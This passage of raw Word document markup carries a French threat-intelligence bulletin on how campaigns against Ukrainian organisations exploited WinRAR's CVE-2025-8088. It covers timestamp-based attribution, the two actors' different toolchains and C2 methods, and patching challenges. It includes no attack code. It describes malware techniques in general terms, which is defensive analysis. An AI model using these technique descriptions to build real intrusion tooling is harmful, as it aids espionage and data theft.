                        </w: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desktop-hagd25b</w:t>
                        </w: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), ce qui confirme l’existence d’un environnement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2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4080533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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compilation unique. Les horodatages de compilation des fichiers PE de quatre versions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3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4253888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="41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distinctes de DLL (3 février, 17 février, 16 mars et 9 avril 2026) se situent tous entre 06h33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4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4427243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="41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11h32 UTC. Les horodatages des archives RAR contenant les fichiers PDF factices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5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4600598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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corroborent indépendamment ces sessions de compilation, s’alignant à quelques secondes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6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4773953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4172772" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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277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près sur les heures de compilation des fichiers PE correspondants.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7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5048908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Convertis en UTC+3 (heure de Moscou), ces horaires correspondent à 09h33-14h32, heure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8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5222263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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locale. Les six événements de compilation ont tous lieu des jours de semaine. Bien que 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9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5395618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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horodatages puissent être manipulés, la régularité des jours de semaine observée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0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5568973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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plusieurs sources et l’alignement avec les horaires de travail en UTC+3 suggèrent qu’un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1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5742328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3272406" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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24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opérateur est basé à proximité de ce fuseau horaire.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2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6413928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5200171" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0171" cy="1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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7.2. Différences avec la campagne de Gamareon : même faille, acteurs différents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3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6724673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Les deux campagnes (UAC-0226 et Gamaredon) examinées dans ce bulletin de juin 2026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4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6898028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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partagent le même exploit initial (CVE-2025-8088) et un profil de victimes similaire, mais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5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7071383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4382462" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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24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leurs chaînes de post-exploitation sont fondamentalement différentes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700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7346338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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SHADOW-EARTH-066 communique avec des serveurs C2 directs basés sur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8032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7519693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5346391" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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463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adresses IP et déploie une DLL x86-64 compilée avec résolution d’API par "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PEB-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29056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7693048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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walk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" et des chaînes de caractères chiffrées en RC4. Gamaredon utilise Cloudflare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0080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7866403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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531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Workers comme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proxy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 C2 et s’appuie sur des outils basés sur des scripts (HTA,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1104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1351280</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8039758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1463291" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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32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VBScript, Powershell).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2128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1171574</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8213113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5006858" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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68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•</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle26"/>
                            <w:spacing w:val="14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Aucune infrastructure commune n’a été identifiée entre les deux campagnes.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3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8475368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Les outils utilisés reflètent des traditions de développement différentes : la famille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4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8647018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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GIFTEDCROOK repose sur un code C++ compilé avec une bibliothèque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libcurl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liée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5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8825253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5266903" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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69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statiquement. Gamaredon a toujours privilégié les approches basées sur des scripts.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62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724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827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929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032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84134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236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3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942295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1264287" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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4287" cy="26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13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33"/>
                          </w:rPr>
                          <w:t xml:space="preserve">8. Conclusion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4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1396388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Bien que la vulnérabilité CVE-2025-8088 ait été corrigée dans WinRAR 7.13 en juillet 2025,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5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1569743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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au moment de la rédaction du présent rapport, plusieurs groupes d’acteurs malveillants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6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1743098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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continuaient à créer de nouveaux échantillons d’exploits à l’aide de documents leurres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1916453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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récents et à utiliser cette vulnérabilité comme vecteur d’accès initial fiable contre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8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2089808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1735985" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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59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organisations ukrainiennes.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9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2364763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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SHADOW-EARTH-066 s’en sert pour déployer un voleur d’informations perfectionné, tandis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0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2538118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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qu’Earth Dahu l’utilise pour diffuser des outils d’espionnage. Des acteurs malveillants alignés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1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2711473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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sur la Russie, notamment Sandworm, Turla et Void Rabisu, auraient également exploité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2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2884828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1588043" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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80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cette même vulnérabilité.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3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3159783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Le fait que des groupes bien établis soutenus par des États et des groupes suivis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4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3333138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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manière indépendante se concentrent tous sur une seule et même vulnérabilité reflète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5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3506493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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l’ampleur des cybermenaces auxquelles l’Ukraine est confrontée. Depuis l’invasion à grande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6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3679848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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échelle de 2022, le nombre de séries d’intrusions menant des opérations contre les réseaux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7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3853203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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gouvernementaux et militaires ukrainiens n’a cessé d’augmenter, et les identifiants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8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4026558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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documents volés lors de ces campagnes ne resteront pas confinés. Les comptes compromis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9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4199913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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au sein des organisations militaires et gouvernementales peuvent créer des risques en aval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4373268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4428982" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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898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pour les nations alliées et les partenaires de leurs réseaux de contacts.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1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4648223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Cette vulnérabilité est exploitable car WinRAR n’est toujours pas corrigé sur un nombre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2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4821578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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suffisant de terminaux pour que l’investissement en vaille la peine. WinRAR ne se met pas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3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4994933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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jour automatiquement, ne prend pas en charge les stratégies de groupe et ne relève pas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4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5168288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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canaux de mise à jour d’entreprise tels que WSUS, SCCM ou Intune. Vérifier l’état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5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5341643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5406882" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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688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correctifs sur des centaines de terminaux nécessite des outils tiers ou un audit manuel.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6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5616598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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SHADOW-EARTH-066 et Gamaredon utilisent des outils et des infrastructures différents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7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5789953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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d’un côté, une chaîne de vol de données compilée en C++ ; de l’autre, un cadre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8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5963308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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d’espionnage basé sur des scripts ; mais tous deux s’appuyaient sur le même point d’entrée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0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6136663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773033" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0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non corrigé.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1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6411618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Ce problème n’est pas propre à WinRAR, à l’Ukraine ou à ces acteurs malveillants.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2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6584973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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nombreuses applications utilitaires, outils d’archivage et visionneuses de fichiers partagent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3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6758328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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les mêmes caractéristiques : elles sont largement installées, rarement mises à jour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4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6931683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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difficiles à gérer à l’échelle de l’entreprise. Elles accumulent au fil du temps des vulnérabilités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5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7105038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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connues, que les acteurs malveillants recherchent délibérément. CVE-2018-20250, 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6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7278393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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vulnérabilité de WinRAR datant de 2018, était encore exploitée dans le cadre d’attaques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7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7451748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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ciblées plusieurs années après sa divulgation. La vulnérabilité CVE-2025-8088 semble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8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7625103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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suivre le même schéma : lorsque les acteurs malveillants trouvent une vulnérabilité qui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9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7798458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4777813" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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78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fonctionne, ils continuent à l’exploiter jusqu’à ce qu’elle cesse d’être efficace.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025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128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23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332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435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8874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1064259"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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064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064259">
                          <a:moveTo>
                            <a:pt x="0" y="788670"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="788670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1064259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1064259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="788670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788670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="788670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9152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2169169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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523874">
                          <a:moveTo>
                            <a:pt x="4127499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="523874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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="523874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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="523874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205865" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="120586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966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2693679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2120264">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4127499" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1236345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="123634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0073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3930659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205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127499" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="883284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883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="883284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883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="883284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0483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4814579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205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127499" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="883285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883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="883285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883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="883285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1609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5698499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4060825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0608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060825">
                          <a:moveTo>
                            <a:pt x="0" y="3785235"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4060825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4060825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3785235"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3510280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3510280"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3510280"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3235325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3510915"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3510915"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3235325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2960370"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2960370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2960370"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2685415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2961005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2961005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2685415"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2060575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2060575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1050290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1050290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1050290"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="889635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889635"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1050925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1050925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889635"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4128134" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4128134" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4128134" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3254375" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4127500" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4127500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3254375" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3254375" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1207135" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1207135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1207135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1916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1064259"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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064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064259">
                          <a:moveTo>
                            <a:pt x="0" y="788670"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="788670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1064259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1064259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="788670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788670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="788670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2326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2169169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5238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523874">
                          <a:moveTo>
                            <a:pt x="4127499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="523874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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="523874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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="523874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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="52387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2838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2693679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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21202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2120264">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4127499" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
